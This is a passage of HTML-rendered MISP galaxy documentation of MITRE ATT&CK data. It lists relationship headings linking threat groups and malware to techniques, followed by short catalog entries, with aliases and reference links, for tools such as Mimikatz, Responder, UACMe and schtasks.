<div class="sect2">
<h3 id="_badnews_s0128_uses_data_from_network_shared_drive_t1039"><a class="anchor" href="#_badnews_s0128_uses_data_from_network_shared_drive_t1039"></a><a class="link" href="#_badnews_s0128_uses_data_from_network_shared_drive_t1039">BADNEWS (S0128) uses Data from Network Shared Drive (T1039)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_dll_side_loading_t1073"><a class="anchor" href="#_plugx_s0013_uses_dll_side_loading_t1073"></a><a class="link" href="#_plugx_s0013_uses_dll_side_loading_t1073">PlugX (S0013) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_remote_file_copy_t1105"><a class="anchor" href="#_apt32_g0050_uses_remote_file_copy_t1105"></a><a class="link" href="#_apt32_g0050_uses_remote_file_copy_t1105">APT32 (G0050) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_powershell_t1086"><a class="anchor" href="#_fin7_g0046_uses_powershell_t1086"></a><a class="link" href="#_fin7_g0046_uses_powershell_t1086">FIN7 (G0046) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_group5_g0043_uses_file_deletion_t1107"><a class="anchor" href="#_group5_g0043_uses_file_deletion_t1107"></a><a class="link" href="#_group5_g0043_uses_file_deletion_t1107">Group5 (G0043) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_seasharpee_s0185"><a class="anchor" href="#_apt34_g0057_uses_seasharpee_s0185"></a><a class="link" href="#_apt34_g0057_uses_seasharpee_s0185">APT34 (G0057) uses SEASHARPEE (S0185)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_system_information_discovery_t1082"><a class="anchor" href="#_jhuhugit_s0044_uses_system_information_discovery_t1082"></a><a class="link" href="#_jhuhugit_s0044_uses_system_information_discovery_t1082">JHUHUGIT (S0044) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_software_packing_t1045"><a class="anchor" href="#_seaduke_s0053_uses_software_packing_t1045"></a><a class="link" href="#_seaduke_s0053_uses_software_packing_t1045">SeaDuke (S0053) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_remote_system_discovery_t1018"><a class="anchor" href="#_remsec_s0125_uses_remote_system_discovery_t1018"></a><a class="link" href="#_remsec_s0125_uses_remote_system_discovery_t1018">Remsec (S0125) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_data_encrypted_mitigation_t1022_mitigates_data_encrypted_t1022"><a class="anchor" href="#_data_encrypted_mitigation_t1022_mitigates_data_encrypted_t1022"></a><a class="link" href="#_data_encrypted_mitigation_t1022_mitigates_data_encrypted_t1022">Data Encrypted Mitigation (T1022) mitigates Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt18_g0026_uses_valid_accounts_t1078"><a class="anchor" href="#_apt18_g0026_uses_valid_accounts_t1078"></a><a class="link" href="#_apt18_g0026_uses_valid_accounts_t1078">APT18 (G0026) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_patchwork_g0040_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_patchwork_g0040_uses_remote_desktop_protocol_t1076">Patchwork (G0040) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_bubblewrap_s0043"><a class="anchor" href="#_admin_338_g0018_uses_bubblewrap_s0043"></a><a class="link" href="#_admin_338_g0018_uses_bubblewrap_s0043">admin@338 (G0018) uses BUBBLEWRAP (S0043)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_process_discovery_t1057"><a class="anchor" href="#_derusbi_s0021_uses_process_discovery_t1057"></a><a class="link" href="#_derusbi_s0021_uses_process_discovery_t1057">Derusbi (S0021) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_data_compressed_t1002"><a class="anchor" href="#_bronze_butler_g0060_uses_data_compressed_t1002"></a><a class="link" href="#_bronze_butler_g0060_uses_data_compressed_t1002">BRONZE BUTLER (G0060) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_rockboot_s0112_uses_bootkit_t1067"><a class="anchor" href="#_rockboot_s0112_uses_bootkit_t1067"></a><a class="link" href="#_rockboot_s0112_uses_bootkit_t1067">ROCKBOOT (S0112) uses Bootkit (T1067)</a></h3>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117_uses_remote_file_copy_t1105"><a class="anchor" href="#_xtunnel_s0117_uses_remote_file_copy_t1105"></a><a class="link" href="#_xtunnel_s0117_uses_remote_file_copy_t1105">XTunnel (S0117) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_file_deletion_mitigation_t1107_mitigates_file_deletion_t1107"><a class="anchor" href="#_file_deletion_mitigation_t1107_mitigates_file_deletion_t1107"></a><a class="link" href="#_file_deletion_mitigation_t1107_mitigates_file_deletion_t1107">File Deletion Mitigation (T1107) mitigates File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_credential_dumping_t1003"><a class="anchor" href="#_fin5_g0053_uses_credential_dumping_t1003"></a><a class="link" href="#_fin5_g0053_uses_credential_dumping_t1003">FIN5 (G0053) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_matroyshka_s0167_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_matroyshka_s0167_uses_obfuscated_files_or_information_t1027">Matroyshka (S0167) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_indicator_removal_on_host_t1070"><a class="anchor" href="#_rtm_s0148_uses_indicator_removal_on_host_t1070"></a><a class="link" href="#_rtm_s0148_uses_indicator_removal_on_host_t1070">RTM (S0148) uses Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_data_transfer_size_limits_t1030"><a class="anchor" href="#_helminth_s0170_uses_data_transfer_size_limits_t1030"></a><a class="link" href="#_helminth_s0170_uses_data_transfer_size_limits_t1030">Helminth (S0170) uses Data Transfer Size Limits (T1030)</a></h3>
</div>
<div class="sect2">
<h3 id="_taint_shared_content_mitigation_t1080_mitigates_taint_shared_content_t1080"><a class="anchor" href="#_taint_shared_content_mitigation_t1080_mitigates_taint_shared_content_t1080"></a><a class="link" href="#_taint_shared_content_mitigation_t1080_mitigates_taint_shared_content_t1080">Taint Shared Content Mitigation (T1080) mitigates Taint Shared Content (T1080)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_seaduke_s0053"><a class="anchor" href="#_apt29_g0016_uses_seaduke_s0053"></a><a class="link" href="#_apt29_g0016_uses_seaduke_s0053">APT29 (G0016) uses SeaDuke (S0053)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_indicator_removal_on_host_t1070"><a class="anchor" href="#_fin5_g0053_uses_indicator_removal_on_host_t1070"></a><a class="link" href="#_fin5_g0053_uses_indicator_removal_on_host_t1070">FIN5 (G0053) uses Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_psexec_s0029_uses_service_execution_t1035"><a class="anchor" href="#_psexec_s0029_uses_service_execution_t1035"></a><a class="link" href="#_psexec_s0029_uses_service_execution_t1035">PsExec (S0029) uses Service Execution (T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_system_information_discovery_t1082"><a class="anchor" href="#_stealth_falcon_g0038_uses_system_information_discovery_t1082"></a><a class="link" href="#_stealth_falcon_g0038_uses_system_information_discovery_t1082">Stealth Falcon (G0038) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_pittytiger_g0011_uses_lurid_s0010"><a class="anchor" href="#_pittytiger_g0011_uses_lurid_s0010"></a><a class="link" href="#_pittytiger_g0011_uses_lurid_s0010">PittyTiger (G0011) uses Lurid (S0010)</a></h3>
</div>
<div class="sect2">
<h3 id="_textmate_s0146_uses_command_line_interface_t1059"><a class="anchor" href="#_textmate_s0146_uses_command_line_interface_t1059"></a><a class="link" href="#_textmate_s0146_uses_command_line_interface_t1059">TEXTMATE (S0146) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_helminth_s0170_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_helminth_s0170_uses_registry_run_keys_start_folder_t1060">Helminth (S0170) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_volgmer_s0180"><a class="anchor" href="#_lazarus_group_g0032_uses_volgmer_s0180"></a><a class="link" href="#_lazarus_group_g0032_uses_volgmer_s0180">Lazarus Group (G0032) uses Volgmer (S0180)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_timestomp_t1099"><a class="anchor" href="#_apt28_g0007_uses_timestomp_t1099"></a><a class="link" href="#_apt28_g0007_uses_timestomp_t1099">APT28 (G0007) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_scripting_t1064"><a class="anchor" href="#_deep_panda_g0009_uses_scripting_t1064"></a><a class="link" href="#_deep_panda_g0009_uses_scripting_t1064">Deep Panda (G0009) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_external_remote_services_mitigation_t1133_mitigates_external_remote_services_t1133"><a class="anchor" href="#_external_remote_services_mitigation_t1133_mitigates_external_remote_services_t1133"></a><a class="link" href="#_external_remote_services_mitigation_t1133_mitigates_external_remote_services_t1133">External Remote Services Mitigation (T1133) mitigates External Remote Services (T1133)</a></h3>
</div>
<div class="sect2">
<h3 id="_seasharpee_s0185_uses_command_line_interface_t1059"><a class="anchor" href="#_seasharpee_s0185_uses_command_line_interface_t1059"></a><a class="link" href="#_seasharpee_s0185_uses_command_line_interface_t1059">SEASHARPEE (S0185) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_winmm_s0059_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_winmm_s0059_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_winmm_s0059_uses_file_and_directory_discovery_t1083">WinMM (S0059) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_geminiduke_s0049_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_geminiduke_s0049_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_geminiduke_s0049_uses_system_network_configuration_discovery_t1016">GeminiDuke (S0049) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_gamaredon_group_g0047_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_gamaredon_group_g0047_uses_exfiltration_over_command_and_control_channel_t1041">Gamaredon Group (G0047) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_blackenergy_s0089_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_blackenergy_s0089_uses_registry_run_keys_start_folder_t1060">BlackEnergy (S0089) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_powersource_s0145_uses_query_registry_t1012"><a class="anchor" href="#_powersource_s0145_uses_query_registry_t1012"></a><a class="link" href="#_powersource_s0145_uses_query_registry_t1012">POWERSOURCE (S0145) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_mis_type_s0084_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_mis_type_s0084_uses_system_owner_user_discovery_t1033">Mis-Type (S0084) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_coreshell_s0137_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_coreshell_s0137_uses_custom_cryptographic_protocol_t1024">CORESHELL (S0137) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_s0128_uses_execution_through_api_t1106"><a class="anchor" href="#_badnews_s0128_uses_execution_through_api_t1106"></a><a class="link" href="#_badnews_s0128_uses_execution_through_api_t1106">BADNEWS (S0128) uses Execution through API (T1106)</a></h3>
</div>
<div class="sect2">
<h3 id="_starloader_s0188_uses_deobfuscate_decode_files_or_information_t1140"><a class="anchor" href="#_starloader_s0188_uses_deobfuscate_decode_files_or_information_t1140"></a><a class="link" href="#_starloader_s0188_uses_deobfuscate_decode_files_or_information_t1140">Starloader (S0188) uses Deobfuscate/Decode Files or Information (T1140)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_input_capture_t1056"><a class="anchor" href="#_lazarus_group_g0032_uses_input_capture_t1056"></a><a class="link" href="#_lazarus_group_g0032_uses_input_capture_t1056">Lazarus Group (G0032) uses Input Capture (T1056)</a></h3>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_enterprise_attack_tool"><a class="anchor" href="#_enterprise_attack_tool"></a><a class="link" href="#_enterprise_attack_tool">Enterprise Attack - Tool</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK software.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Enterprise Attack - Tool is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise</a> attack - tool.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_at_s0110"><a class="anchor" href="#_at_s0110"></a><a class="link" href="#_at_s0110">at - S0110</a></h3>
<div class="paragraph">
<p>at is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At)</p>
</div>
<div class="paragraph">
<p>Aliases: at, at.exe</p>
</div>
<div class="paragraph">
<p>at - S0110 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>at</p>
</li>
<li>
<p>at.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1124. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0110">https://attack.mitre.org/wiki/Software/S0110</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490866.aspx">https://technet.microsoft.com/en-us/library/bb490866.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_route_s0103"><a class="anchor" href="#_route_s0103"></a><a class="link" href="#_route_s0103">route - S0103</a></h3>
<div class="paragraph">
<p>route can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)</p>
</div>
<div class="paragraph">
<p>Aliases: route, route.exe</p>
</div>
<div class="paragraph">
<p>route - S0103 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>route</p>
</li>
<li>
<p>route.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1125. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0103">https://attack.mitre.org/wiki/Software/S0103</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490991.aspx">https://technet.microsoft.com/en-us/library/bb490991.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tasklist_s0057"><a class="anchor" href="#_tasklist_s0057"></a><a class="link" href="#_tasklist_s0057">Tasklist - S0057</a></h3>
<div class="paragraph">
<p>The Tasklist utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)</p>
</div>
<div class="paragraph">
<p>Aliases: Tasklist</p>
</div>
<div class="paragraph">
<p>Tasklist - S0057 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Tasklist</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1126. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0057">https://attack.mitre.org/wiki/Software/S0057</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb491010.aspx">https://technet.microsoft.com/en-us/library/bb491010.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_credential_editor_s0005"><a class="anchor" href="#_windows_credential_editor_s0005"></a><a class="link" href="#_windows_credential_editor_s0005">Windows Credential Editor - S0005</a></h3>
<div class="paragraph">
<p>Windows Credential Editor is a password dumping tool. (Citation: Amplia WCE)</p>
</div>
<div class="paragraph">
<p>Aliases: Windows Credential Editor, WCE</p>
</div>
<div class="paragraph">
<p>Windows Credential Editor - S0005 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Windows Credential Editor</p>
</li>
<li>
<p>WCE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1127. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0005">https://attack.mitre.org/wiki/Software/S0005</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.ampliasecurity.com/research/wcefaq.html">http://www.ampliasecurity.com/research/wcefaq.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_responder_s0174"><a class="anchor" href="#_responder_s0174"></a><a class="link" href="#_responder_s0174">Responder - S0174</a></h3>
<div class="paragraph">
<p>Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)</p>
</div>
<div class="paragraph">
<p>Aliases: Responder</p>
</div>
<div class="paragraph">
<p>Responder - S0174 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Responder</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1128. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0174">https://attack.mitre.org/wiki/Software/S0174</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/SpiderLabs/Responder">https://github.com/SpiderLabs/Responder</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_schtasks_s0111"><a class="anchor" href="#_schtasks_s0111"></a><a class="link" href="#_schtasks_s0111">schtasks - S0111</a></h3>
<div class="paragraph">
<p>schtasks is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)</p>
</div>
<div class="paragraph">
<p>Aliases: schtasks, schtasks.exe</p>
</div>
<div class="paragraph">
<p>schtasks - S0111 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>schtasks</p>
</li>
<li>
<p>schtasks.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1129. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0111">https://attack.mitre.org/wiki/Software/S0111</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490996.aspx">https://technet.microsoft.com/en-us/library/bb490996.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uacme_s0116"><a class="anchor" href="#_uacme_s0116"></a><a class="link" href="#_uacme_s0116">UACMe - S0116</a></h3>
<div class="paragraph">
<p>UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)</p>
</div>
<div class="paragraph">
<p>Aliases: UACMe</p>
</div>
<div class="paragraph">
<p>UACMe - S0116 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>UACMe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1130. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0116">https://attack.mitre.org/wiki/Software/S0116</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ifconfig_s0101"><a class="anchor" href="#_ifconfig_s0101"></a><a class="link" href="#_ifconfig_s0101">ifconfig - S0101</a></h3>
<div class="paragraph">
<p>ifconfig is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)</p>
</div>
<div class="paragraph">
<p>Aliases: ifconfig</p>
</div>
<div class="paragraph">
<p>ifconfig - S0101 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ifconfig</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1131. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0101">https://attack.mitre.org/wiki/Software/S0101</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Ifconfig">https://en.wikipedia.org/wiki/Ifconfig</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mimikatz_s0002"><a class="anchor" href="#_mimikatz_s0002"></a><a class="link" href="#_mimikatz_s0002">Mimikatz - S0002</a></h3>
<div class="paragraph">
<p>Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)</p>
</div>
<div class="paragraph">
<p>Aliases: Mimikatz</p>
</div>
<div class="paragraph">
<p>Contributors: Vincent Le Toux</p>
</div>
<div class="paragraph">
<p>Mimikatz - S0002 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Mimikatz</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1132. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0002">https://attack.mitre.org/wiki/Software/S0002</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/gentilkiwi/mimikatz">https://github.com/gentilkiwi/mimikatz</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://adsecurity.org/?page%20id=1821">https://adsecurity.org/?page%20id=1821</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xcmd_s0123"><a class="anchor" href="#_xcmd_s0123"></a><a class="link" href="#_xcmd_s0123">xCmd - S0123</a></h3>
<div class="literalblock">
<div class="content">
<pre>(Citation: xCmd) is an open source tool that is similar to PsExec and allows the user to execute applications on remote systems. (Citation: xCmd)</pre>
</div>
</div>
<div class="paragraph">
<p>Aliases: (Citation: xCmd)</p>
</div>
<div class="paragraph">
<p>xCmd - S0123 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>xCmd</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1133. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0123">https://attack.mitre.org/wiki/Software/S0123</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/">https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mimipenguin_s0179"><a class="anchor" href="#_mimipenguin_s0179"></a><a class="link" href="#_mimipenguin_s0179">MimiPenguin - S0179</a></h3>
<div class="paragraph">
<p>is a credential dumper, similar to Mimikatz, designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: MimiPenguin</p>
</div>
<div class="paragraph">
<p>Contributors: Vincent Le Toux</p>
</div>
<div class="paragraph">
<p>MimiPenguin - S0179 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>MimiPenguin</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1134. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0179">https://attack.mitre.org/wiki/Software/S0179</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/huntergregal/mimipenguin">https://github.com/huntergregal/mimipenguin</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_systeminfo_s0096"><a class="anchor" href="#_systeminfo_s0096"></a><a class="link" href="#_systeminfo_s0096">Systeminfo - S0096</a></h3>
<div class="paragraph">
<p>Systeminfo is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)</p>
</div>
<div class="paragraph">
<p>Aliases: Systeminfo, systeminfo.exe</p>
</div>
<div class="paragraph">
<p>Systeminfo - S0096 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Systeminfo</p>
</li>
<li>
<p>systeminfo.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1135. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0096">https://attack.mitre.org/wiki/Software/S0096</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb491007.aspx">https://technet.microsoft.com/en-us/library/bb491007.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netsh_s0108"><a class="anchor" href="#_netsh_s0108"></a><a class="link" href="#_netsh_s0108">netsh - S0108</a></h3>
<div class="paragraph">
<p>netsh is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)</p>
</div>
<div class="paragraph">
<p>Aliases: netsh, netsh.exe</p>
</div>
<div class="paragraph">
<p>netsh - S0108 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>netsh</p>
</li>
<li>
<p>netsh.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
